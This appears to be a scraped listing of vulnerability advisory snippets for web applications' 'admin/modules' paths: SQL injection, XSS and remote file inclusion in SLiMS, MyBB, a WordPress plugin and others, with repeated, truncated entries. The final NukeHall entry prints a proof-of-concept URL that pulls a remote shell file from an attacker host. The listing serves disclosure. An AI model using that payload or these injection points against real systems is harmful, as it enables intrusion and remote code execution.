CVE-2021-45791

Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/membertype.php, /admin/modules/system/usergroup.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users...

Sql injection

Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/membertype.php, /admin/modules/system/usergroup.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users...

CVE-2021-45792

Slims9 Bulian 9.4.2 is affected by Cross Site Scripting XSS in /admin/modules/system/customfield.php...

CVE-2021-45791

CVE-2021-45791 affects Slims8 Akasia 8.3.1. A SQL injection exists in multiple admin modules (bibliography, member_type, user_group, membership index) via the dir parameter, due to insufficient input escaping/validation. Exploitation is described as feasible by remotely authenticated librarian us...

Slims8 Akasia SQL注入漏洞

Slims8 Akasia is a software of the Slims community in Indonesia. It is used for library resource management e.g. books, journals, digital documents and other library materials and administration.An SQL injection vulnerability exists in Slims8 Akasia version 8.3.1, which stems from missing SQL...

CVE-2020-20633

ajaxpolicygenerator in admin/modules/cli-policy-generator/classes/class-policy-generator-ajax.php in GDPR Cookie Consent cookie-law-info 1.8.2 and below plugin for WordPress, allows authenticated stored XSS and privilege escalation...

CVE-2020-20633

ajaxpolicygenerator in admin/modules/cli-policy-generator/classes/class-policy-generator-ajax.php in GDPR Cookie Consent cookie-law-info 1.8.2 and below plugin for WordPress, allows authenticated stored XSS and privilege escalation...

CVE-2020-20633

CVE-2020-20633 affects the WordPress plugin GDPR Cookie Consent (cookie-law-info) versions 1.8.2 and earlier, via ajax_policy_generator in admin/modules/cli-policy-generator/classes/class-policy-generator-ajax.php. The vulnerability allows authenticated stored XSS and privilege escalation. The co...

Module Filter - Moderately critical - Cross site scripting - SA-CONTRIB-2019-042

This module enables you to filter the list of modules on the admin modules page, and organizes packages into vertical tabs. The module doesn't sufficiently escape HTML under the scenario leading to a Cross Site Scripting XSS vulnerability. This vulnerability is mitigated by the fact that the...

CVE-2018-12658

Reflected Cross-Site Scripting XSS exists in the Stock Take module in SLiMS 8 Akasia 8.3.1 via an admin/modules/stocktake/index.php?keywords= URI...

CVE-2017-9443

BigTree CMS through 4.2.18 allows remote authenticated users to conduct SQL injection attacks via a crafted tables object in manifest.json in an uploaded package. This issue exists in core\admin\modules\developer\extensions\install\process.php and...

SLiMS 7 Cendana Cross-Site Scripting Vulnerability

SLiMS 7 Cendana is an open source, free library management system. A cross-site scripting vulnerability exists in the admin/modules component in SLiMS 7 Cendana on 2017-03-23 and earlier. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML...

Cross site scripting

Multiple Cross-Site Scripting XSS were discovered in admin/modules components in SLiMS 7 Cendana through 2017-03-23: the keywords parameter to bibliography/checkoutitem.php, bibliography/dlprint.php, bibliography/item.php, bibliography/itembarcodegenerator.php, bibliography/printedcard.php,...

CVE-2017-7242

Multiple Cross-Site Scripting XSS were discovered in admin/modules components in SLiMS 7 Cendana through 2017-03-23: the keywords parameter to bibliography/checkoutitem.php, bibliography/dlprint.php, bibliography/item.php, bibliography/itembarcodegenerator.php, bibliography/printedcard.php,...

CVE-2017-7242

CVE-2017-7242 is an XSS vulnerability in SLiMS 7 Cendana affecting multiple admin/modules components. The described flaws involve unsafely handling user-supplied input in the keywords parameter across several scripts (bibliography/checkout_item.php, bibliography/dl_print.php, bibliography/item.ph...

Command Execution Vulnerability in the datetime Parameter of the Mixcall Seat Management System

Mixcall seat management system is based on B/S architecture, the management personnel can directly log into the Mixcall seat management center through the computer, and view the detailed situation related to the seat personnel's voice services. A command execution vulnerability exists in the...

CVE-2012-5909

SQL injection vulnerability in admin/modules/user/users.php in MyBB aka MyBulletinBoard 1.6.6 allows remote attackers to execute arbitrary SQL commands via the conditionsusergroup parameter in a search action to admin/index.php...

CVE-2012-3998

Multiple SQL injection vulnerabilities in Sticky Notes before 0.2.27052012.5 allow remote attackers to execute arbitrary SQL commands via the 1 paste id in admin/modules/modpastes.php or 2 show.php, 3 user id to admin/modules/modusers.php, 4 project to list.php, or 5 session id to show.php...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in Open Education System OES 0.1 beta allow remote attackers to execute arbitrary PHP code via a URL in the CONFINCLUDEPATH parameter to 1 forum/admin.php and 2 plotgraph/index.php in admin/modules/modules/, and 3 adminuser/modadmuser.php and 4...

NukeHall 0.3 - Multiple Remote File Inclusions

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://server/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...